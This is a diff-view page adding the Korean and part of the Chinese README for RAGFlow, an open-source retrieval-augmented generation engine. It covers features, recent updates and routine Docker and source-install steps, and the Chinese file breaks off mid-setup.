|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<div align="center">
|
2 |
+
<a href="https://demo.ragflow.io/">
|
3 |
+
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
|
4 |
+
</a>
|
5 |
+
</div>
|
6 |
+
|
7 |
+
<p align="center">
|
8 |
+
<a href="./README.md">English</a> |
|
9 |
+
<a href="./README_zh.md">简体中文</a> |
|
10 |
+
<a href="./README_ja.md">日本語</a> |
|
11 |
+
<a href="./README_ko.md">한국어</a> |
|
12 |
+
</p>
|
13 |
+
|
14 |
+
<p align="center">
|
15 |
+
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
16 |
+
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
17 |
+
</a>
|
18 |
+
<a href="https://demo.ragflow.io" target="_blank">
|
19 |
+
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
20 |
+
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
21 |
+
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
|
22 |
+
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
23 |
+
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
24 |
+
</a>
|
25 |
+
</p>
|
26 |
+
|
27 |
+
<h4 align="center">
|
28 |
+
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
29 |
+
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
30 |
+
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
31 |
+
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
32 |
+
<a href="https://demo.ragflow.io">Demo</a>
|
33 |
+
</h4>
|
34 |
+
|
35 |
+
|
36 |
+
## 💡 RAGFlow란?
|
37 |
+
|
38 |
+
[RAGFlow](https://ragflow.io/)는 심층 문서 이해에 기반한 오픈소스 RAG (Retrieval-Augmented Generation) 엔진입니다. 이 엔진은 대규모 언어 모델(LLM)과 결합하여 정확한 질문 응답 기능을 제공하며, 다양한 복잡한 형식의 데이터에서 신뢰할 수 있는 출처를 바탕으로 한 인용을 통해 이를 뒷받침합니다. RAGFlow는 규모에 상관없이 모든 기업에 최적화된 RAG 워크플로우를 제공합니다.
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
## 🎮 데모
|
43 |
+
데모를 [https://demo.ragflow.io](https://demo.ragflow.io)에서 실행해 보세요.
|
44 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
45 |
+
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
46 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
|
47 |
+
</div>
|
48 |
+
|
49 |
+
|
50 |
+
## 🔥 업데이트
|
51 |
+
|
52 |
+
- 2024-09-13 지식베이스 Q&A 검색 모드를 추가합니다.
|
53 |
+
|
54 |
+
- 2024-09-09 Agent에 의료상담 템플릿을 추가하였습니다.
|
55 |
+
|
56 |
+
- 2024-08-22 RAG를 통해 SQL 문에 텍스트를 지원합니다.
|
57 |
+
|
58 |
+
- 2024-08-02: [graphrag](https://github.com/microsoft/graphrag)와 마인드맵에서 영감을 받은 GraphRAG를 지원합니다.
|
59 |
+
|
60 |
+
- 2024-07-23: 오디오 파일 분석을 지원합니다.
|
61 |
+
|
62 |
+
- 2024-07-08: [Graph](./agent/README.md)를 기반으로 한 워크플로우를 지원합니다.
|
63 |
+
|
64 |
+
- 2024-06-27 Q&A 구문 분석 방식에서 Markdown 및 Docx를 지원하고, Docx 파일에서 이미지 추출, Markdown 파일에서 테이블 추출을 지원합니다.
|
65 |
+
|
66 |
+
- 2024-05-23: 더 나은 텍스트 검색을 위해 [RAPTOR](https://arxiv.org/html/2401.18059v1)를 지원합니다.
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
## 🌟 주요 기능
|
71 |
+
|
72 |
+
### 🍭 **"Quality in, quality out"**
|
73 |
+
- [심층 문서 이해](./deepdoc/README.md)를 기반으로 복잡한 형식의 비정형 데이터에서 지식을 추출합니다.
|
74 |
+
- 문자 그대로 무한한 토큰에서 "데이터 속의 바늘"을 찾아냅니다.
|
75 |
+
|
76 |
+
### 🍱 **템플릿 기반의 chunking**
|
77 |
+
- 똑똑하고 설명 가능한 방식.
|
78 |
+
- 다양한 템플릿 옵션을 제공합니다.
|
79 |
+
|
80 |
+
|
81 |
+
### 🌱 **할루시네이션을 줄인 신뢰할 수 있는 인용**
|
82 |
+
- 텍스트 청킹을 시각화하여 사용자가 개입할 수 있도록 합니다.
|
83 |
+
- 중요한 참고 자료와 추적 가능한 인용을 빠르게 확인하여 신뢰할 수 있는 답변을 지원합니다.
|
84 |
+
|
85 |
+
|
86 |
+
### 🍔 **다른 종류의 데이터 소스와의 호환성**
|
87 |
+
- 워드, 슬라이드, 엑셀, 텍스트 파일, 이미지, 스캔본, 구조화된 데이터, 웹 페이지 등을 지원합니다.
|
88 |
+
|
89 |
+
### 🛀 **자동화되고 손쉬운 RAG 워크플로우**
|
90 |
+
- 개인 및 대규모 비즈니스에 맞춘 효율적인 RAG 오케스트레이션.
|
91 |
+
- 구성 가능한 LLM 및 임베딩 모델.
|
92 |
+
- 다중 검색과 결합된 re-ranking.
|
93 |
+
- 비즈니스와 원활하게 통합할 수 있는 직관적인 API.
|
94 |
+
|
95 |
+
|
96 |
+
## 🔎 시스템 아키텍처
|
97 |
+
|
98 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
99 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
100 |
+
</div>
|
101 |
+
|
102 |
+
## 🎬 시작하기
|
103 |
+
### 📝 사전 준비 사항
|
104 |
+
- CPU >= 4 cores
|
105 |
+
- RAM >= 16 GB
|
106 |
+
- Disk >= 50 GB
|
107 |
+
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
108 |
+
> 로컬 머신(Windows, Mac, Linux)에 Docker가 설치되지 않은 경우, [Docker 엔진 설치]((https://docs.docker.com/engine/install/))를 참조하세요.
|
109 |
+
|
110 |
+
|
111 |
+
### 🚀 서버 시작하기
|
112 |
+
|
113 |
+
1. `vm.max_map_count`가 262144 이상인지 확인하세요:
|
114 |
+
> `vm.max_map_count`의 값을 아래 명령어를 통해 확인하세요:
|
115 |
+
>
|
116 |
+
> ```bash
|
117 |
+
> $ sysctl vm.max_map_count
|
118 |
+
> ```
|
119 |
+
>
|
120 |
+
> 만약 `vm.max_map_count` 이 262144 보다 작다면 값을 쟈설정하세요.
|
121 |
+
>
|
122 |
+
> ```bash
|
123 |
+
> # 이 경우에 262144로 설정했습니다.:
|
124 |
+
> $ sudo sysctl -w vm.max_map_count=262144
|
125 |
+
> ```
|
126 |
+
>
|
127 |
+
> 이 변경 사항은 시스템 재부팅 후에 초기화됩니다. 변경 사항을 영구적으로 적용하려면 /etc/sysctl.conf 파일에 vm.max_map_count 값을 추가하거나 업데이트하세요:
|
128 |
+
>
|
129 |
+
> ```bash
|
130 |
+
> vm.max_map_count=262144
|
131 |
+
> ```
|
132 |
+
|
133 |
+
2. 레포지토리를 클론하세요:
|
134 |
+
|
135 |
+
```bash
|
136 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
137 |
+
```
|
138 |
+
|
139 |
+
3. 미리 빌드된 Docker 이미지를 생성하고 서버를 시작하세요:
|
140 |
+
|
141 |
+
> 다음 명령어를 실행하면 *dev* 버전의 RAGFlow Docker 이미지가 자동으로 다운로드됩니다. 특정 Docker 버전을 다운로드하고 실행하려면, **docker/.env** 파일에서 `RAGFLOW_VERSION`을 원하는 버전으로 업데이트한 후, 예를 들어 `RAGFLOW_VERSION=v0.11.0`로 업데이트 한 뒤, 다음 명령어를 실행하세요.
|
142 |
+
```bash
|
143 |
+
$ cd ragflow/docker
|
144 |
+
$ chmod +x ./entrypoint.sh
|
145 |
+
$ docker compose up -d
|
146 |
+
```
|
147 |
+
|
148 |
+
> 기본 이미지는 약 9GB 크기이며 로드하는 데 시간이 걸릴 수 있습니다.
|
149 |
+
|
150 |
+
|
151 |
+
4. 서버가 시작된 후 서버 상태를 확인하세요:
|
152 |
+
|
153 |
+
```bash
|
154 |
+
$ docker logs -f ragflow-server
|
155 |
+
```
|
156 |
+
|
157 |
+
_다음 출력 결과로 시스템이 성공적으로 시작되었음을 확인합니다:_
|
158 |
+
|
159 |
+
```bash
|
160 |
+
____ ______ __
|
161 |
+
/ __ \ ____ _ ____ _ / ____// /____ _ __
|
162 |
+
/ /_/ // __ `// __ `// /_ / // __ \| | /| / /
|
163 |
+
/ _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
|
164 |
+
/_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
|
165 |
+
/____/
|
166 |
+
|
167 |
+
* Running on all addresses (0.0.0.0)
|
168 |
+
* Running on http://127.0.0.1:9380
|
169 |
+
* Running on http://x.x.x.x:9380
|
170 |
+
INFO:werkzeug:Press CTRL+C to quit
|
171 |
+
```
|
172 |
+
> 만약 확인 단계를 건너뛰고 바로 RAGFlow에 로그인하면, RAGFlow가 완전히 초기화되지 않았기 때문에 브라우저에서 `network abnormal` 오류가 발생할 수 있습니다.
|
173 |
+
|
174 |
+
5. 웹 브라우저에 서버의 IP 주소를 입력하고 RAGFlow에 로그인하세요.
|
175 |
+
> 기본 설정을 사용할 경우, `http://IP_OF_YOUR_MACHINE`만 입력하면 됩니다 (포트 번호는 제외). 기본 HTTP 서비스 포트 `80`은 기본 구성으로 사용할 때 생략할 수 있습니다.
|
176 |
+
6. [service_conf.yaml](./docker/service_conf.yaml) 파일에서 원하는 LLM 팩토리를 `user_default_llm`에 선택하고, `API_KEY` 필드를 해당 API 키로 업데이트하세요.
|
177 |
+
> 자세한 내용은 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)를 참조하세요.
|
178 |
+
|
179 |
+
_이제 쇼가 시작됩니다!_
|
180 |
+
|
181 |
+
## 🔧 설정
|
182 |
+
|
183 |
+
시스템 설정과 관련하여 다음 파일들을 관리해야 합니다:
|
184 |
+
|
185 |
+
- [.env](./docker/.env): `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, `MINIO_PASSWORD`와 같은 시스템의 기본 설정을 포함합니다.
|
186 |
+
- [service_conf.yaml](./docker/service_conf.yaml): 백엔드 서비스를 구성합니다.
|
187 |
+
- [docker-compose.yml](./docker/docker-compose.yml): 시스템은 [docker-compose.yml](./docker/docker-compose.yml)을 사용하여 시작됩니다.
|
188 |
+
|
189 |
+
[.env](./docker/.env) 파일의 변경 사항이 [service_conf.yaml](./docker/service_conf.yaml) 파일의 내용과 일치하도록 해야 합니다.
|
190 |
+
|
191 |
+
> [./docker/README](./docker/README.md) 파일에는 환경 설정과 서비스 구성에 대한 자세한 설명이 있으며, [./docker/README](./docker/README.md) 파일에 나열된 모든 환경 설정이 [service_conf.yaml](./docker/service_conf.yaml) 파일의 해당 구성과 일치하도록 해야 합니다.
|
192 |
+
|
193 |
+
기본 HTTP 서비스 포트(80)를 업데이트하려면 [docker-compose.yml](./docker/docker-compose.yml) 파일에서 `80:80`을 `<YOUR_SERVING_PORT>:80`으로 변경하세요.
|
194 |
+
|
195 |
+
> 모든 시스템 구성 업데이트는 적용되기 위해 시스템 재부팅이 필요합니다.
|
196 |
+
>
|
197 |
+
> ```bash
|
198 |
+
> $ docker-compose up -d
|
199 |
+
> ```
|
200 |
+
|
201 |
+
## 🛠️ 소스에서 빌드하기
|
202 |
+
|
203 |
+
Docker 이미지를 소스에서 빌드하려면:
|
204 |
+
|
205 |
+
```bash
|
206 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
207 |
+
$ cd ragflow/
|
208 |
+
$ docker build -t infiniflow/ragflow:dev .
|
209 |
+
$ cd ragflow/docker
|
210 |
+
$ chmod +x ./entrypoint.sh
|
211 |
+
$ docker compose up -d
|
212 |
+
```
|
213 |
+
|
214 |
+
|
215 |
+
## 🛠️ 소스에서 서비스 시작하기
|
216 |
+
|
217 |
+
서비스를 소스에서 시작하려면:
|
218 |
+
|
219 |
+
1. 레포지토리를 클론하세요:
|
220 |
+
|
221 |
+
```bash
|
222 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
223 |
+
$ cd ragflow/
|
224 |
+
```
|
225 |
+
|
226 |
+
2. 가상 환경을 생성하고, Anaconda 또는 Miniconda가 설치되어 있는지 확인하세요:
|
227 |
+
```bash
|
228 |
+
$ conda create -n ragflow python=3.11.0
|
229 |
+
$ conda activate ragflow
|
230 |
+
$ pip install -r requirements.txt
|
231 |
+
```
|
232 |
+
|
233 |
+
```bash
|
234 |
+
# CUDA 버전��� 12.0보다 높은 경우, 다음 명령어를 추가로 실행하세요:
|
235 |
+
$ pip uninstall -y onnxruntime-gpu
|
236 |
+
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
237 |
+
```
|
238 |
+
|
239 |
+
3. 진입 스크립트를 복사하고 환경 변수를 설정하세요:
|
240 |
+
```bash
|
241 |
+
# 파이썬 경로를 받아옵니다:
|
242 |
+
$ which python
|
243 |
+
# RAGFlow 프로젝트 경로를 받아옵니다:
|
244 |
+
$ pwd
|
245 |
+
```
|
246 |
+
|
247 |
+
```bash
|
248 |
+
$ cp docker/entrypoint.sh .
|
249 |
+
$ vi entrypoint.sh
|
250 |
+
```
|
251 |
+
|
252 |
+
```bash
|
253 |
+
# 실제 상황에 맞게 설정 조정하기 (다음 두 개의 export 명령어는 새로 추가되었습니다):
|
254 |
+
# - `which python`의 결과를 `PY`에 할당합니다.
|
255 |
+
# - `pwd`의 결과를 `PYTHONPATH`에 할당합니다.
|
256 |
+
# - `LD_LIBRARY_PATH`가 설정되어 있는 경우 주석 처리합니다.
|
257 |
+
# - 선택 사항: Hugging Face 미러 추가.
|
258 |
+
PY=${PY}
|
259 |
+
export PYTHONPATH=${PYTHONPATH}
|
260 |
+
export HF_ENDPOINT=https://hf-mirror.com
|
261 |
+
```
|
262 |
+
|
263 |
+
4. 다른 서비스(MinIO, Elasticsearch, Redis, MySQL)를 시작하세요:
|
264 |
+
```bash
|
265 |
+
$ cd docker
|
266 |
+
$ docker compose -f docker-compose-base.yml up -d
|
267 |
+
```
|
268 |
+
|
269 |
+
5. 설정 파일을 확인하여 다음 사항을 확인하세요:
|
270 |
+
- **docker/.env**의 설정이 **conf/service_conf.yaml**의 설정과 일치하는지 확인합니다.
|
271 |
+
- **service_conf.yaml**의 관련 서비스에 대한 IP 주소와 포트가 로컬 머신의 IP 주소와 컨테이너에서 노출된 포트와 일치하는지 확인합니다.
|
272 |
+
|
273 |
+
|
274 |
+
6. RAGFlow 백엔드 서비스를 시작합니다:
|
275 |
+
|
276 |
+
```bash
|
277 |
+
$ chmod +x ./entrypoint.sh
|
278 |
+
$ bash ./entrypoint.sh
|
279 |
+
```
|
280 |
+
|
281 |
+
7. 프론트엔드 서비스를 시작합니다:
|
282 |
+
|
283 |
+
```bash
|
284 |
+
$ cd web
|
285 |
+
$ npm install --registry=https://registry.npmmirror.com --force
|
286 |
+
$ vim .umirc.ts
|
287 |
+
# proxy.target을 http://127.0.0.1:9380로 업데이트합니다.
|
288 |
+
$ npm run dev
|
289 |
+
```
|
290 |
+
|
291 |
+
8. 프론트엔드 서비스를 배포합니다:
|
292 |
+
|
293 |
+
```bash
|
294 |
+
$ cd web
|
295 |
+
$ npm install --registry=https://registry.npmmirror.com --force
|
296 |
+
$ umi build
|
297 |
+
$ mkdir -p /ragflow/web
|
298 |
+
$ cp -r dist /ragflow/web
|
299 |
+
$ apt install nginx -y
|
300 |
+
$ cp ../docker/nginx/proxy.conf /etc/nginx
|
301 |
+
$ cp ../docker/nginx/nginx.conf /etc/nginx
|
302 |
+
$ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
|
303 |
+
$ systemctl start nginx
|
304 |
+
```
|
305 |
+
|
306 |
+
## 📚 문서
|
307 |
+
|
308 |
+
- [Quickstart](https://ragflow.io/docs/dev/)
|
309 |
+
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
|
310 |
+
- [References](https://ragflow.io/docs/dev/category/references)
|
311 |
+
- [FAQ](https://ragflow.io/docs/dev/faq)
|
312 |
+
|
313 |
+
## 📜 로드맵
|
314 |
+
|
315 |
+
[RAGFlow 로드맵 2024](https://github.com/infiniflow/ragflow/issues/162)을 확인하세요.
|
316 |
+
|
317 |
+
## 🏄 커뮤니티
|
318 |
+
|
319 |
+
- [Discord](https://discord.gg/4XxujFgUN7)
|
320 |
+
- [Twitter](https://twitter.com/infiniflowai)
|
321 |
+
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
322 |
+
|
323 |
+
## 🙌 컨트리뷰션
|
324 |
+
|
325 |
+
RAGFlow는 오픈소스 협업을 통해 발전합니다. 이러한 정신을 바탕으로, 우리는 커뮤니티의 다양한 기여를 환영합니다. 참여하고 싶으시다면, 먼저 [가이드라인](./docs/references/CONTRIBUTING.md)을 검토해 주세요.
|
README_zh.md
ADDED
@@ -0,0 +1,329 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<div align="center">
|
2 |
+
<a href="https://demo.ragflow.io/">
|
3 |
+
<img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
|
4 |
+
</a>
|
5 |
+
</div>
|
6 |
+
|
7 |
+
<p align="center">
|
8 |
+
<a href="./README.md">English</a> |
|
9 |
+
<a href="./README_zh.md">简体中文</a> |
|
10 |
+
<a href="./README_ja.md">日本語</a> |
|
11 |
+
<a href="./README_ko.md">한국어</a>
|
12 |
+
</p>
|
13 |
+
|
14 |
+
<p align="center">
|
15 |
+
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
16 |
+
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
17 |
+
</a>
|
18 |
+
<a href="https://demo.ragflow.io" target="_blank">
|
19 |
+
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
20 |
+
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
21 |
+
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
|
22 |
+
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
23 |
+
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
24 |
+
</a>
|
25 |
+
</p>
|
26 |
+
|
27 |
+
<h4 align="center">
|
28 |
+
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
29 |
+
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
30 |
+
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
31 |
+
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
32 |
+
<a href="https://demo.ragflow.io">Demo</a>
|
33 |
+
</h4>
|
34 |
+
|
35 |
+
## 💡 RAGFlow 是什么?
|
36 |
+
|
37 |
+
[RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
|
38 |
+
|
39 |
+
## 🎮 Demo 试用
|
40 |
+
|
41 |
+
请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
|
42 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
43 |
+
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
44 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
|
45 |
+
</div>
|
46 |
+
|
47 |
+
|
48 |
+
## 🔥 近期更新
|
49 |
+
|
50 |
+
- 2024-09-13 增加知识库问答搜索模式。
|
51 |
+
- 2024-09-09 在 Agent 中加入医疗问诊模板。
|
52 |
+
- 2024-08-22 支持用RAG技术实现从自然语言到SQL语句的转换。
|
53 |
+
- 2024-08-02 支持 GraphRAG 启发于 [graphrag](https://github.com/microsoft/graphrag) 和思维导图。
|
54 |
+
- 2024-07-23 支持解析音频文件。
|
55 |
+
- 2024-07-08 支持 Agentic RAG: 基于 [Graph](./agent/README.md) 的工作流。
|
56 |
+
- 2024-06-27 Q&A 解析方式支持 Markdown 文件和 Docx 文件,支持提取出 Docx 文件中的图片和 Markdown 文件中的表格。
|
57 |
+
- 2024-05-23 实现 [RAPTOR](https://arxiv.org/html/2401.18059v1) 提供更好的文本检索。
|
58 |
+
|
59 |
+
## 🌟 主要功能
|
60 |
+
|
61 |
+
### 🍭 **"Quality in, quality out"**
|
62 |
+
|
63 |
+
- 基于[深度文档理解](./deepdoc/README.md),能够从各类复杂格式的非结构化数据中提取真知灼见。
|
64 |
+
- 真正在无限上下文(token)的场景下快速完成大海捞针测试。
|
65 |
+
|
66 |
+
### 🍱 **基于模板的文本切片**
|
67 |
+
|
68 |
+
- 不仅仅是智能,更重要的是可控可解释。
|
69 |
+
- 多种文本模板可供选择
|
70 |
+
|
71 |
+
### 🌱 **有理有据、最大程度降低幻觉(hallucination)**
|
72 |
+
|
73 |
+
- 文本切片过程可视化,支持手动调整。
|
74 |
+
- 有理有据:答案提供关键引用的快照并支持追根溯源。
|
75 |
+
|
76 |
+
### 🍔 **兼容各类异构数据源**
|
77 |
+
|
78 |
+
- 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。
|
79 |
+
|
80 |
+
### 🛀 **全程无忧、自动化的 RAG 工作流**
|
81 |
+
|
82 |
+
- 全面优化的 RAG 工作流可以支持从个人应用乃至超大型企业的各类生态系统。
|
83 |
+
- 大语言模型 LLM 以及向量模型均支持配置。
|
84 |
+
- 基于多路召回、融合重排序。
|
85 |
+
- 提供易用的 API,可以轻松集成到各类企业系统。
|
86 |
+
|
87 |
+
## 🔎 系统架构
|
88 |
+
|
89 |
+
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
90 |
+
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
91 |
+
</div>
|
92 |
+
|
93 |
+
## 🎬 快速开始
|
94 |
+
|
95 |
+
### 📝 前提条件
|
96 |
+
|
97 |
+
- CPU >= 4 核
|
98 |
+
- RAM >= 16 GB
|
99 |
+
- Disk >= 50 GB
|
100 |
+
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
101 |
+
> 如果你并没有在本机安装 Docker(Windows、Mac,或者 Linux), 可以参考文档 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安装。
|
102 |
+
|
103 |
+
### 🚀 启动服务器
|
104 |
+
|
105 |
+
1. 确保 `vm.max_map_count` 不小于 262144:
|
106 |
+
|
107 |
+
> 如需确认 `vm.max_map_count` 的大小:
|
108 |
+
>
|
109 |
+
> ```bash
|
110 |
+
> $ sysctl vm.max_map_count
|
111 |
+
> ```
|
112 |
+
>
|
113 |
+
> 如果 `vm.max_map_count` 的值小于 262144,可以进行重置:
|
114 |
+
>
|
115 |
+
> ```bash
|
116 |
+
> # 这里我们设为 262144:
|
117 |
+
> $ sudo sysctl -w vm.max_map_count=262144
|
118 |
+
> ```
|
119 |
+
>
|
120 |
+
> 你的改动会���下次系统重启时被重置。如果希望做永久改动,还需要在 **/etc/sysctl.conf** 文件里把 `vm.max_map_count` 的值再相应更新一遍:
|
121 |
+
>
|
122 |
+
> ```bash
|
123 |
+
> vm.max_map_count=262144
|
124 |
+
> ```
|
125 |
+
|
126 |
+
2. 克隆仓库:
|
127 |
+
|
128 |
+
```bash
|
129 |
+
$ git clone https://github.com/infiniflow/ragflow.git
|
130 |
+
```
|
131 |
+
|
132 |
+
3. 进入 **docker** 文件夹,利用提前编译好的 Docker 镜像启动服务器:
|
133 |
+
|
134 |
+
```bash
|
135 |
+
$ cd ragflow/docker
|
136 |
+
$ chmod +x ./entrypoint.sh
|
137 |
+
$ docker compose -f docker-compose-CN.yml up -d
|
138 |
+
```
|
139 |
+
|
140 |
+
> 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.11.0,然后运行上述命令。
|
141 |
+
|
142 |
+
> 核心镜像文件大约 9 GB,可能需要一定时间拉取。请耐心等待。
|
143 |
+
|
144 |
+
4. 服务器启动成功后再次确认服务器状态:
|
145 |
+
|
